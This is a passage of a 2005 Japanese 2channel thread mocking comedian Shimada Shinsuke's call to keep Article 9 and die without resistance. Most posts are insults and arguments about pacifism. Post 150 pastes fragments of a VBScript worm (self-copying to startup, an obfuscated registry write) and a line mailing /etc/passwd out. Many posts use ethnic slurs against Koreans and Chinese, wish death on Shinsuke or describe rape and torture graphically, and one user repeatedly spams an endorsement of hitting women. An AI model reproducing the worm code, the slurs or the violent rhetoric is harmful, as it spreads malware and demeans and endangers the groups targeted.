大義名分が成り立とうが成り立つまいが、無抵抗な人間もぎょーさん殺されてるんじゃボケ!

136 :番組の途中ですが名無しです:2005/05/06(金) 00:03:24 ID:uTS/FHQm0
紳助はオナニーマンだから泳がせとけ

関わっても得るもの無い

137 :番組の途中ですが名無しです:2005/05/06(金) 00:03:31 ID:AgdXbFAC0 ?
第2章 戦争の放棄
〔戦争の放棄と戦力及び交戦権の否認〕
第9条 日本国民は、正義と秩序を基調とする国際平和を誠実に希求し、
国権の発動たる戦争と、武力による威嚇又は武力の行使は、
国際紛争を解決する手段としては、永久にこれを放棄する。
2 前項の目的を達するため、陸海空軍その他の戦力は、これを保持しない。
国の交戦権は、これを認めない。
http://www.ndl.go.jp/constitution/etc/j01.html#2


>>124
日本でも"砲撃で穴空けて潜行不能にした後、拿捕するのが妥当"ですか?

138 :番組の途中ですが名無しです:2005/05/06(金) 00:03:49 ID:0KCymXZs0
シンスケってどこの人?

139 :番組の途中ですが名無しです:2005/05/06(金) 00:04:04 ID:URShf69R0
あるアニメで、マフィアの男が組織の情報を情報屋にバラして、身内の組織に
拉致られ、拷問され、実は妻子も拉致られてて、喋らんと妻子殺す言われて、
喋った後、妻子を殺され悲鳴聞きながら自分も殺されるシーンを思い出すなぁw

140 :番組の途中ですが名無しです:2005/05/06(金) 00:06:00 ID:szzGrUq40 ?#
>>137
普通の国だったらと言ってる
今の憲法厳守のままだったら、原潜に核撃たれて初めて反撃、なんていう狂った状況になり兼ねん

141 :番組の途中ですが名無しです:2005/05/06(金) 00:07:42 ID:cdEG+4oZ0
We bleave
That faith in God gives meaning and purpose to human life
That the brotherhood of man transcends the sovereignty of nations
That economic justice can best be won by free man through free enterprise
That government should be of laws rather than of men
That earth's great treasure lies in human personality
And that service to humanity is the best work of life.

142 :番組の途中ですが名無しです:2005/05/06(金) 00:09:02 ID:l3nBNYE/0
>>98
どうなんだろうな?
ただ紳助が選挙応援した尾立のHPは
部落解放同盟のHPへリンク貼ってるけど。

143 :番組の途中ですが名無しです:2005/05/06(金) 00:09:46 ID:Z4yCW7ty0
気に入らん事があると暴力沙汰を起こす人には言われたくないわwww

144 :番組の途中ですが名無しです:2005/05/06(金) 00:10:23 ID:AJORLc9C0
弱い立場の人間だけは一方的に殴りつける伸介が言っても説得力ゼロ

145 :番組の途中ですが名無しです:2005/05/06(金) 00:11:49 ID:7KHTj5Aw0
無抵抗の人間殴って唾はいた人間がよく言うよw

146 :番組の途中ですが名無しです:2005/05/06(金) 00:12:12 ID:3au9dyJW0
大義名分なんか成り立つか

147 :名無しさん@5周年:2005/05/06(金) 00:12:38 ID:7wwRBNLT0
漫才師が政治を語るようになった日本は
もう終わりだな

148 :番組の途中ですが名無しです:2005/05/06(金) 00:13:39 ID:2TOmhgtsO
でも恨みをかわない国家になることは大事だと思う。

149 :番組の途中ですが名無しです:2005/05/06(金) 00:13:51 ID:vg4bPanS0 ?
>>143
それモロに左翼の特徴だよな。

150 :番組の途中ですが名無しです:2005/05/06(金) 00:15:58 ID:xRmuXFro0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

151 :番組の途中ですが名無しです:2005/05/06(金) 00:16:26 ID:AJORLc9C0
>>148
他国に恨み持たれてない先進国なんかひとつもねーよ
目指すだけ無駄

152 :番組の途中ですが名無しです:2005/05/06(金) 00:17:37 ID:vg4bPanS0 ?
>>104
そういやカプコンって、
1942と1943っていう米軍機を操って日本軍を相手に戦うゲームを出してたな。

153 :番組の途中ですが名無しです:2005/05/06(金) 00:18:58 ID:y80GLLfI0
結局9条は猿には無理

154 :番組の途中ですが名無しです:2005/05/06(金) 00:19:39 ID:URShf69R0
また良スレ認定か

155 :番組の途中ですが名無しです:2005/05/06(金) 00:19:40 ID:KI3mKKXy0



  こいつ、暴力振るってたじゃんwwwwwwww




156 :番組の途中ですが名無しです:2005/05/06(金) 00:19:57 ID:qRslbJhY0
人は殴るが無抵抗主義か
すぐキレて怒鳴りまくってる平和運動の市民団体みたいだな

157 :番組の途中ですが名無しです:2005/05/06(金) 00:21:28 ID:sR+Zrxdb0
一気に2ちゃんねらーを敵に回したな

158 :番組の途中ですが名無しです:2005/05/06(金) 00:22:09 ID:1I4fpOhD0
で、気に入らん女は殴る

159 :番組の途中ですが名無しです:2005/05/06(金) 00:22:31 ID:1I4fpOhD0
で、気に入らん女は殴る

160 :番組の途中ですが名無しです:2005/05/06(金) 00:22:35 ID:IE1OOAPe0
こいつもそうだけど菅も岡田も整形美人も
嫌いな奴は次から次とむかつくことを
繰り出してくれるのである意味期待通りww

161 :番組の途中ですが名無しです:2005/05/06(金) 00:23:07 ID:gmL/26ob0
じゃ、まず自分が真っ先に殺されろ。逃げるなよ。

162 :番組の途中ですが名無しです:2005/05/06(金) 00:23:26 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ



163 :番組の途中ですが名無しです:2005/05/06(金) 00:23:33 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ




164 :番組の途中ですが名無しです:2005/05/06(金) 00:23:36 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ




165 :番組の途中ですが名無しです:2005/05/06(金) 00:23:38 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ




166 :番組の途中ですが名無しです:2005/05/06(金) 00:23:41 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ




167 :番組の途中ですが名無しです:2005/05/06(金) 00:23:45 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ




168 :番組の途中ですが名無しです:2005/05/06(金) 00:23:47 ID:1I4fpOhD0

右翼の多い、2ちゃんえらーを敵に回したな

で、気に入らん女は殴るのはいいことだ




169 :番組の途中ですが名無しです:2005/05/06(金) 00:24:55 ID:3RyFEpmp0
>向こうは攻める理由ができるもん

いやいや出来ないから。

170 :番組の途中ですが名無しです:2005/05/06(金) 00:25:12 ID:w1tQrE4I0
>>147
昔、青島とノックが同時に知事になった時あったやん。その時、オレ、タイに
居たのだが、タイの新聞に「コメディアンを行政の長に選んだ日本、もうダメポ」
という記事が載ってた。
シンスケみたいな奴をのさばらせるのは国際的にも恥ずかしい事だと日本人は自覚
すべきだと思う。

171 :番組の途中ですが名無しです:2005/05/06(金) 00:26:34 ID:2mYUSb8W0
死ぬなら一人で勝手に死んでくれ
回避しようと思えば回避できることで死にたくないっての

172 :番組の途中ですが名無しです:2005/05/06(金) 00:26:42 ID:l3nBNYE/0
>>170
結局青島もノックも散々だったな

173 :番組の途中ですが名無しです:2005/05/06(金) 00:26:52 ID:OpYVte5j0
紳助の娘って司法試験勉強してるんだよな。そういえば、憲法第9条を必要
以上に熱く語る講師がいたな。あんま出ないんだけど。あそこか。

174 :番組の途中ですが名無しです:2005/05/06(金) 00:27:00 ID:LvrBhtsQ0
大阪コメディアン行政ワロス

175 :番組の途中ですが名無しです:2005/05/06(金) 00:27:13 ID:GIo6Vk+q0 ?###
そういやこいつの上を行く横山ノック師匠がいたかwwww
こいつも反自民だったな。

176 :番組の途中ですが名無しです:2005/05/06(金) 00:28:23 ID:+btpxq/t0
つーか女殴ったり
泣いて誤魔化そうとしたり
9条マンセーしたりチョンそのまんまじゃん。
きもいよー

177 :番組の途中ですが名無しです:2005/05/06(金) 00:28:26 ID:DfmfJfUs0
「(島田紳助は)やはり狂人であったか。
降りかかる火の粉は払わねばなるまい。」

178 :番組の途中ですが名無しです:2005/05/06(金) 00:28:42 ID:sjKN+7Mw0
まー ある種さんせーですね

179 :とっととハメ太郎 ◆25wwG7HaME :2005/05/06(金) 00:29:21 ID:0ESU2tfj0
複数の解釈ができてしまう9条は書き直すべき。改憲で明解なものにしてください。
憲法は国民の権利も保障するもので、無抵抗で死ななければならないような憲法をもつ
バカ国家は歴史上存在しない。十戒を授かったユダヤ人でさえ軍事力による防衛と侵略を
繰り返している。人が憲法を守るのではなく、憲法が人を守るものにしなくてはならない。
無抵抗はひっそりと個人レベルでやってくれ。

180 :番組の途中ですが名無しです:2005/05/06(金) 00:30:06 ID:gYuV9xvWO
実際、本当に攻めこまれたら逆の事いいそうだけでな

181 :番組の途中ですが名無しです:2005/05/06(金) 00:33:39 ID:vg4bPanS0 ?
>>173
魔骨のことかー。

182 :番組の途中ですが名無しです:2005/05/06(金) 00:33:58 ID:PNh7NRQ20
あらら芸能人が政治語り始めたらダメだよ。

183 :番組の途中ですが名無しです:2005/05/06(金) 00:34:07 ID:QPDnrns10
原因を探ると大阪のブサヨ化現象は戦後の在日朝鮮人の大量不法入国にあるんじゃないか?


184 :番組の途中ですが名無しです:2005/05/06(金) 00:36:13 ID:rcV5hyVz0 ?##
北朝鮮の大義名分が通用するのは北朝鮮国内だけじゃないか。

185 :番組の途中ですが名無しです:2005/05/06(金) 00:36:44 ID:ZWzuDRdR0
>>1
ひとなぐりまくりのやつが

186 :番組の途中ですが名無しです:2005/05/06(金) 00:42:48 ID:csF/mpDS0
島田のとりまきが立てた宣伝スレ

187 :番組の途中ですが名無しです:2005/05/06(金) 00:45:05 ID:bPZvkd790
ID:1I4fpOhD0

アボーン設定にしますた

188 :番組の途中ですが名無しです:2005/05/06(金) 00:46:48 ID:139eZz5J0
なるほど。
以前あったように、女は強姦され、マンコに木の棒を突き刺されて殺されても無抵抗
子供は手足を切断され、泣き叫ぶのを嘲笑と優越の眼差しで見られながらも無抵抗
男は顔の皮を剥がれ、引きずりまわされても無抵抗、で死ね、と。
たとえそれが自分の家族恋人友人でも、無抵抗、と。
素晴らしい博愛主義者だな。

189 :番組の途中ですが名無しです:2005/05/06(金) 00:49:13 ID:qSNkqZF40
おいおい、いくら紳助だってこんなアホなこと書くわけないだろ

190 :番組の途中ですが名無しです:2005/05/06(金) 00:52:34 ID:mME1Yk4L0
>>179
>人が憲法を守るのではなく、憲法が人を守るものにしなくてはならない。

なるほど。

191 :番組の途中ですが名無しです:2005/05/06(金) 00:56:15 ID:HstwMuN20
実際死ぬとなると宗教系の人ぐらいしかできない

192 :番組の途中ですが名無しです:2005/05/06(金) 00:56:40 ID:jdG5DVYJ0
とりあえずテレビ芸人を、もてはやすのやめようよ
20年来の、団塊=在日文化だよ

193 :愛しい」紳助様へ:2005/05/06(金) 00:57:36 ID:7AHD9kec0
2ヶ月ぶりに見た君の顔
  とても元気そうで安心した
  ずっと前の記憶が感情が鮮明に蘇った
  やっと変わった、思い出から好きへ。
  なのに、何で??
  あなたは悪くないのに 自分を責めるの?
  思いっきり抱きしめたい
  あなたの暖かさを感じたい。
  このまま時が止まればなんて思った。
  素敵やん、なんて・・・
  キレイ事言わないで。。。
  もっと色んなことしておけば良かったなんて、
  そんなこと言わないで。苦しい。
  昨日は平気な顔でテレビを見ていた。
  泣かずに一日が終った。
  平気かと思ったら、今日になってボロボロ。
  痛心・・・心が痛む。チクチクする。
  何で心が痛むんだろ。
  こうやって大人になるのかな。
  こうやって成長するのかな。


194 :番組の途中ですが名無しです:2005/05/06(金) 00:58:36 ID:P+e8D7h40
反戦左翼って、なぜか暴力的な奴が多いんだよな。
9条守るためなら殺人でも犯す、ってような奴がな。

反戦=非暴力では決してない

195 :番組の途中ですが名無しです:2005/05/06(金) 00:58:50 ID:8H0QUjiD0 ?#
これは本心じゃなく護憲者への皮肉だろ?

196 :番組の途中ですが名無しです:2005/05/06(金) 01:02:00 ID:54M3IzTc0 ?#
芸人が本当のことを言うわけがないだろ。

197 :番組の途中ですが名無しです:2005/05/06(金) 01:03:41 ID:l3nBNYE/0
出版社:毎日新聞社

198 :番組の途中ですが名無しです:2005/05/06(金) 01:27:58 ID:69CsuhH10
伸介GJ
犠牲者第一号よろしく
TVで中継してね

199 :番組の途中ですが名無しです:2005/05/06(金) 01:40:29 ID:6Ytzn5s+0
>>60
石原寛治とかもそんなこといってた気がする

200 :番組の途中ですが名無しです:2005/05/06(金) 01:42:09 ID:i4ZotLud0
伸介氏ねよ

201 :番組の途中ですが名無しです:2005/05/06(金) 01:44:10 ID:VRWSdLbV0
>>4が素晴らしすぎるwwwwwwwwwwwwwwwwwwwwwwwww

202 :番組の途中ですが名無しです:2005/05/06(金) 01:46:04 ID:rUo6/Snl0
なんでこういう事言う奴ってろくでなしばっかりなんだろう?

二重人格だから両極端なのか、想像力が偏っていて貧困なのか。

203 :番組の途中ですが名無しです:2005/05/06(金) 01:51:12 ID:LdBmOF1D0
そういう伸介さんは誰か殴ってませんでしたっけ?

204 :番組の途中ですが名無しです:2005/05/06(金) 01:53:56 ID:EvjEmcYq0
テメェーの事しか考えない典型だな・・・・
これからの日本人(現在子供)の事を考えるのが大人の役目なのに・・・

205 :番組の途中ですが名無しです:2005/05/06(金) 01:55:49 ID:1icNRk2A0
大義名分なくても平気で人を殴りよる

206 :番組の途中ですが名無しです:2005/05/06(金) 01:56:48 ID:leVMW6GW0
すげーガンマニアらすい

207 :番組の途中ですが名無しです:2005/05/06(金) 01:57:07 ID:duABM49m0
>>1
それをやったのがチベットだろ馬鹿

208 :番組の途中ですが名無しです:2005/05/06(金) 01:57:11 ID:kJ4BJtfy0
無抵抗の女の髪の毛をもって引きずり回して殴りつけた男がよく言う。

209 :番組の途中ですが名無しです:2005/05/06(金) 01:57:45 ID:0jKGT/tN0
ひとりでしゃくれてろよ

210 :番組の途中ですが名無しです:2005/05/06(金) 02:00:07 ID:AkzjAI1e0
久々にわろたw
すぐ切れまくって胸倉つかむ(自分より弱いもの限定で)やつが
よう言うでw

211 :番組の途中ですが名無しです:2005/05/06(金) 02:00:07 ID:6Fs4eaeo0
'96の本みたいだな
それでいて、この10年での暴虐ぶりは・・・・。
普通にサイコパス野郎だw
最も信用できないタイプ

212 :番組の途中ですが名無しです:2005/05/06(金) 02:02:54 ID:/M2d3aN20 ?##
楠正成の子孫としては、最後の一人になってもでも、守り通すつもりだ。
うおおおおおおおおおおおおおおお

213 :番組の途中ですが名無しです:2005/05/06(金) 02:04:39 ID:gOYuUVQx0

おまえが、無抵抗な女を殴ったんだろ

このクズ芸人が

214 :番組の途中ですが名無しです:2005/05/06(金) 02:04:54 ID:6G71Oh1j0
平和憲法守って滅亡を受け入れる 少数の精神は、
多数派の意見の犠牲のもとに成り立つので却下されなければならない。
という理屈を、

なぜ、サヨクたちは理解できんのだろうね。 理解できれば、
憲法改正を推進して9条破棄する方に進むべきという
多数民主主義に従うのだろうか

215 :番組の途中ですが名無しです:2005/05/06(金) 02:07:34 ID:pjPjjj4p0
>>207
無抵抗でも改宗して共産党に従わないと銃殺刑
中国的には治安を乱す不穏分子の粛清

無抵抗でも生意気に自分に意見する奴は自分より弱ければ髪をひっぱって殴り、泣いて許しを乞うまでパンチのコンボ
しんすけ的には社会の常識を教える為の教育



216 :番組の途中ですが名無しです:2005/05/06(金) 02:08:12 ID:Dn8rZt0u0
攻撃されたら一番騒ぎそうな奴が何言ってんの?

217 :番組の途中ですが名無しです:2005/05/06(金) 02:09:09 ID:8qEY4VCbO
まぁ世界中の国が武装しないでいられれば、
それに超した事は無いんだが

218 :番組の途中ですが名無しです:2005/05/06(金) 02:09:38 ID:/M2d3aN20 ?##
抵抗したくなければ、しなければいい。
俺は戦う。
目の前で、愛すべき人達が殺されているのに、何もしない事ほど後悔することはない。
俺と勝負しろ!
うおおおおおおおおおおおおおおおおおおおおおおおおおおおおお!!!!!!!

219 :番組の途中ですが名無しです:2005/05/06(金) 02:10:01 ID:vg4bPanS0 ?
>>212
沖雅也とも親戚ってことか。

220 :番組の途中ですが名無しです:2005/05/06(金) 02:11:42 ID:/M2d3aN20 ?##
>>217
この世から全ての悪を滅ぼし、生まれさせない方法があるのなら、教えてくれ。
神の称号を貰えるよ、きっと。
平和なんか馬鹿が一人いれば、あっという間に崩れ去る。
金正日や金日成みたいな大馬鹿者がな!

221 :番組の途中ですが名無しです:2005/05/06(金) 02:13:12 ID:Ky4bqYoo0
馬鹿ってすごいよね

222 :番組の途中ですが名無しです:2005/05/06(金) 02:13:39 ID:/M2d3aN20 ?##
>>219
シラネ。
ただ、苗字が一緒で、バーちゃんがよく春日大社がどーのこーの言ってるから、
きっと楠正成の子孫に違いないって思ってるだけw

223 :小説家志望フセイン:2005/05/06(金) 02:14:49 ID:0AX09k/60
おいおい、おい!

いままでもこれからもおまえは、弱い相手にしか暴力ふるわずに生きていくんだろうが!
ここまでウソをよくもまあ書けたもんだな!



224 :番組の途中ですが名無しです:2005/05/06(金) 02:16:10 ID:mIMlEty70
         ∧ ∧
       ヽ(・∀ ・)ノ <またんきでーす!
       (( ノ(  )ヽ ))
         <  >
これが斉藤またんきクオリティ
http://ex10.2ch.net/test/read.cgi/news4vip/1115300687/

225 :番組の途中ですが名無しです:2005/05/06(金) 02:17:21 ID:ZzXAjjrm0
軍備なんか金かかるだけじゃないか。
しかも結局アメリカが儲かるだけだし。

紳介の擁護でもないが、本当に理想なのは武器の無い世の中だろ?
マニフェストならともかくただのエッセイで理想を語っちゃいけないのか?


226 :小説家志望フセイン:2005/05/06(金) 02:19:42 ID:0AX09k/60
言うだけならタダ。
思うだけなら光速よりも速い。

ここまでいうなら、テメエのこれまでの生き様を理想とてらしあわせてみりゃあいい。
ものすごい乖離していますよ伸介さん。

227 :番組の途中ですが名無しです:2005/05/06(金) 02:22:07 ID:WCLgGiOZO
侵略してきた相手から自らを守る戦いさえ悪と考えるのは
分別のつかないバカとしか言えない
目の前で家族や友人や隣人を殺され凌辱されるのを黙って見ているのが平和的だというのなら
立派なキチガイと認定せざるを得ない

228 :番組の途中ですが名無しです:2005/05/06(金) 02:24:23 ID:PVnJmqSr0
世紀末覇王さまがお怒りです!!

229 :番組の途中ですが名無しです:2005/05/06(金) 02:25:49 ID:2P1oD4Py0
俺はサヨの中でも、適当な言い逃れで誤魔化す卑怯者よりは、
こういうお花畑まっしぐらな香具師の方が好きだ。

230 :番組の途中ですが名無しです:2005/05/06(金) 02:28:32 ID:nJ9DTWwqO
紳助は上岡龍太郎に影響されまくり。

231 :番組の途中ですが名無しです:2005/05/06(金) 02:29:29 ID:vg4bPanS0 ?
>>227
人間は動物とは違う、理性がある、というのを間違った方向で理解してるとしか思えないよな。
ふだん平和的に草を食む羊や牛ですら襲われたら必死に抵抗するのに、
それすらせずに無抵抗で死んでいこうとはね。

232 :番組の途中ですが名無しです:2005/05/06(金) 02:31:36 ID:/LzY38Y20
何だコイツ。

233 :番組の途中ですが名無しです:2005/05/06(金) 02:35:32 ID:GQ5+aart0
こういうことを言いつつ、死刑廃止とか人権擁護とか言ってる奴らの
頭の中はどうなってるのか、さばいて見てみたい。
自分の脳みそがねじれてるのに気づいて無いんだろうなあ。

234 :番組の途中ですが名無しです:2005/05/06(金) 02:36:40 ID:3802sIDb0


      マネージャーに手を出しといて無抵抗ですか、そうですか(w



235 :番組の途中ですが名無しです:2005/05/06(金) 02:40:30 ID:LOZOerDJ0 ?###
俺の中学生時代の青臭い考えと同じだぜ


あの頃は若かった

236 :番組の途中ですが名無しです:2005/05/06(金) 02:44:55 ID:ADFnm5oh0
相変わらずシンスケは出鱈目だな

237 :番組の途中ですが名無しです:2005/05/06(金) 02:46:31 ID:WlDHHgIo0
さすが元在日だな。日本の戦力を削ぐことに余念がないな。

238 :番組の途中ですが名無しです:2005/05/06(金) 02:48:38 ID:GvR0zbGS0
それにしても、その本が出版されたのって軽く10年以上昔だろ
それにしては北朝鮮?
ぁゃιぃ

239 :番組の途中ですが名無しです:2005/05/06(金) 02:48:54 ID:bE4Cxijh0
平和ボケもいいとこだな
あんたの一番大切な人が殺されてもそんなきれいごと言ってられるのかと

240 :番組の途中ですが名無しです:2005/05/06(金) 02:50:49 ID:LOZOerDJ0 ?###
ガンジーの偉人伝でも読んで感化されたのかな

241 :番組の途中ですが名無しです:2005/05/06(金) 02:50:57 ID:X3+jKNua0 ?
> 無抵抗な人間には大義名分は成り立たへんのやから。

少なくともオランダのイスラム系移民には成り立つみたいだな。
ttp://musume80.exblog.jp/1326745

242 :番組の途中ですが名無しです:2005/05/06(金) 02:51:59 ID:he6/CfGc0
まだ、出馬意欲あった頃の本だね。
しゃみん党(←なぜか変換できない。カコイイ)から出る気だったのかな。

http://www.amazon.co.jp/exec/obidos/ASIN/4877583351/250-6299605-1520262
単行本: 213 p ; サイズ(cm): 19 x 13
出版社: KTC中央出版 ; ISBN: 4877583351 ; (2004/10)

243 :番組の途中ですが名無しです:2005/05/06(金) 02:52:17 ID:cPpllfY40
>島田紳助「憲法9条を守りながら無抵抗で死んでいこう」


で、無抵抗の女は殴ると。

244 :神奈川kitty:2005/05/06(金) 02:55:46 ID:AWNs5PuH0 ?##
俺も同じ様な考えなんだが

自衛隊って、ぶっちゃけ違憲だと思うのよ
あくまでも憲法を守るってのなら、本気で守るべきかと
自衛隊なんてもたず、他国の戦争を鼻で笑ってやれば良いんだよ
お前らまだ戦争なんて古臭くて野蛮な事してるの?俺等はアメリカ様が無理矢理押しつけた憲法を守ってますよってね。
それが出来るのは日本だけだと思うのよ。だから日本がやらなければ、と。

それが出来ないなら、自衛隊なんて半端な物じゃなく軍隊作って戦争すりゃいいじゃん。
中途半端な今の状況が一番良くないんじゃね?

245 :番組の途中ですが名無しです:2005/05/06(金) 02:59:00 ID:oL2wEYNI0
ガンジーみたいなものすごい指導者でもいればな。
でも自分が指示して無抵抗の人を見殺しにするのは、普通の人間には
出来ない。

246 :番組の途中ですが名無しです:2005/05/06(金) 03:01:38 ID:IPnNTN730
紳介の家族を本人の目の前で惨殺しても
なにも言われないの?

247 :番組の途中ですが名無しです:2005/05/06(金) 03:08:26 ID:LOZOerDJ0 ?###
>>244
日本は決して安全な地域じゃないから何時戦争を仕掛けられるかわから無い
そんな状況で自衛軍を持つ事は構わないと思う
戦争は仕掛けなくても仕掛けられる可能性は大いに有るしね



248 :番組の途中ですが名無しです:2005/05/06(金) 03:10:03 ID:nUSp5EreO
ワラタ!
宗教みてえだな

249 :番組の途中ですが名無しです:2005/05/06(金) 03:13:30 ID:mDuLrqmD0
長もちしそうなスレだなw

250 :番組の途中ですが名無しです:2005/05/06(金) 03:15:10 ID:WeUxF3Bs0
こういうこと真顔で言うやつ、たまに居るけど、
残虐なチャンコロに目の前で娘を死ぬまでレイプされ続け、
自分は生皮でも剥がされてゆっくりと殺されて……
と現実にそういうことが起こったときに、それでも同じことを考えられるやつは
0.0001%くらいはいるんだろうか。

反戦や平和主義をやたら唱える連中やマスコミって、
実際に他国から攻撃でもされた日にゃ、
まっさきに政府の無策を責める態度に豹変する連中だって気がする。

251 :番組の途中ですが名無しです:2005/05/06(金) 03:19:06 ID:QL5uKKba0
こういうこと真顔で言うやつ、たまに居るけど、
残虐な日本人に目の前で娘を死ぬまでレイプされ続け、
自分は生皮でも剥がされてゆっくりと殺されて……
と現実にそういうことが起こったけど、それでも同じことを考えられるやつは
0.0001%くらいはいたんだろうか。

反戦や平和主義をやたら唱える連中やマスコミを煽るヤツって
実際に他国から攻撃でもされた日にゃ、
まっさきに自分だけ助かるために降伏する連中だって気がする。

252 :神奈川kitty:2005/05/06(金) 03:19:26 ID:AWNs5PuH0 ?##
>>247
だから、それでも自衛軍を持たず、まだ軍隊なんて持ってるの?
と、鼻で笑う事に意味があると思う
それが出来ないなら憲法改正し、軍隊を所持するべきだと

253 :番組の途中ですが名無しです:2005/05/06(金) 03:21:55 ID:5BswW9Lq0
無抵抗な女を平気で殴り倒す男がどの口で言うんだ

254 :番組の途中ですが名無しです:2005/05/06(金) 03:29:13 ID:utUwCmY6O
国際情勢が不安定になれば変わってくるよな
そうならない方が良いのは確かだが

255 :番組の途中ですが名無しです:2005/05/06(金) 03:30:09 ID:KI3mKKXy0



  伸介の家に強盗が入る予感

    なんせ無抵抗ですから



256 :番組の途中ですが名無しです:2005/05/06(金) 03:30:49 ID:WeUxF3Bs0
>>251
日本語不自由なのに無理に改変しなくてもw
意味が通じてねーじゃん……

257 :番組の途中ですが名無しです:2005/05/06(金) 03:36:07 ID:Dr/c8/2O0
じゃ、伸介は自分の嫁や娘にも「死ね」と言えるわけだな。

鬼だな。

258 :番組の途中ですが名無しです:2005/05/06(金) 03:38:43 ID:vg4bPanS0 ?
>>250
ふだんから中国びいきにしてればそういう目に遭わないと思ってるんだろ。
実際そんなことはなくて、日本人というだけで殺されたり犯されたりするだろうにね。
もちろん工作員なら話は別だけど。

259 :番組の途中ですが名無しです:2005/05/06(金) 03:45:18 ID:8JAO0APc0
>>1
ブックオフで100円で買った10年以上前の本の中身をわざわざ見て
書き込んでるおまえ

260 :番組の途中ですが名無しです:2005/05/06(金) 04:27:50 ID:jAWEo1NZO
伸介とかどうでもいいや
興味無い

261 :番組の途中ですが名無しです:2005/05/06(金) 04:29:47 ID:iW65j/FW0
無抵抗てマグロ状態の伸介なんて氏ねや

262 :番組の途中ですが名無しです:2005/05/06(金) 04:31:21 ID:xl5JoGAL0
こいつ、無抵抗で死んでいこうとか言う割には
力の弱い女をぶん殴ったりしてるけどなー。
あの民族の考えることはよくわからん・・・

263 :番組の途中ですが名無しです:2005/05/06(金) 04:31:44 ID:V30QjW5m0
龍太郎師匠のネタを真に受けたな。

264 :番組の途中ですが名無しです:2005/05/06(金) 04:33:40 ID:T5gsw2Mx0
平和主義を自慢してる奴に限って実生活で暴力的なんだよな
井筒とかこいつとか

265 :番組の途中ですが名無しです:2005/05/06(金) 04:34:21 ID:KNY+HDlx0
低能はなんでサヨになるんだろね
左翼の洗脳をそのまま脳にきざみ込むんだな
ほんと気狂いDQって気持ち悪い

266 :番組の途中ですが名無しです:2005/05/06(金) 04:35:57 ID:2TLKhxtb0
ちょっと言葉遣いが悪かった女をボコったくせに

267 :番組の途中ですが名無しです:2005/05/06(金) 04:41:08 ID:4VrepDRk0 ?#
厨房のとき社会の資料集の九条のページに伸介の発言が載ってたな
「俺やったら丸腰の奴は殴らなへんもん。だって喧嘩する気ない奴殴ったってしゃあないやん。」みたいな感じ

268 :番組の途中ですが名無しです:2005/05/06(金) 04:42:41 ID:ewOvEmij0 ?#
無抵抗で死んでいこうとか言いつつ自分は助かるだろうと思ってそう

269 :番組の途中ですが名無しです:2005/05/06(金) 04:43:15 ID:t24gm0cr0
>>267
伊丹空港で大暴れして警察まで出る事態になった馬鹿がそれか
スッチーにイチャモンつけていびり倒す常習犯がどの口でいっとるんだw

270 :番組の途中ですが名無しです:2005/05/06(金) 04:48:39 ID:nJ9DTWwqO
紳助って超ドSで、SMクラブでムチャクチャなプレイするそうだな。
確か、ダウンタウン松本が言ってたと思う。

271 :番組の途中ですが名無しです:2005/05/06(金) 04:55:10 ID:oBV1oz1i0
サンプロで田原に洗脳されたんじゃねえの

272 :番組の途中ですが名無しです:2005/05/06(金) 05:00:08 ID:Coe4q29w0
外交力=軍事力なのを忘れてる。
ロシア、北チョンなんかを見ればわかるだろ。

273 :番組の途中ですが名無しです:2005/05/06(金) 05:18:17 ID:rwY4W2aC0
紳介みたいな暴力野郎が居るから、市民は武装するんですよww

軍隊持つな、と言うのは警察イラネと同義
同じ日本人すら信用できないのに、他国しかもヤクザみたいな連中を信用できるかって
やああっっってやるぜぇ

274 :番組の途中ですが名無しです:2005/05/06(金) 05:19:19 ID:RMntXAS/O
皮肉かと思って、よく言ったって思った。
中見て唖然とした

275 :番組の途中ですが名無しです:2005/05/06(金) 05:22:31 ID:fWpVupMb0
島田伸助ってチョソ?

276 :番組の途中ですが名無しです:2005/05/06(金) 05:24:03 ID:6IPVqAsR0
在日または在日的な生きかたを、肯定してきた我々の問題もある
こんなやつがなんでレギュラーたくさんもってきたかだ

277 :番組の途中ですが名無しです:2005/05/06(金) 05:24:34 ID:6Fs4eaeo0
>>270
確か、写真週刊誌に載ってたろ
仮面付けてて、顔は分からんが
しゃくれでバレバレってやつ

278 :番組の途中ですが名無しです:2005/05/06(金) 05:24:50 ID:wMnzBYko0
田代も平和と人権を愛するテロ朝でニュースキャスターやってたな

279 :番組の途中ですが名無しです:2005/05/06(金) 05:45:01 ID:UzBA2Dye0
半島出身だからじゃないの?
あちらの人にしてみれば、祖国の解放軍が
やってくるようなもんで。

280 :番組の途中ですが名無しです:2005/05/06(金) 05:53:49 ID:GTY+ylMf0
>>33
何の著書で言ってたんだよwww
司馬の考えはまったく逆だろw

281 :番組の途中ですが名無しです:2005/05/06(金) 06:14:39 ID:5XzrVC9q0
伸介って何かの宗教やってる?
訳が分からん 正気とは思えん
死ぬなら一人で死ねや

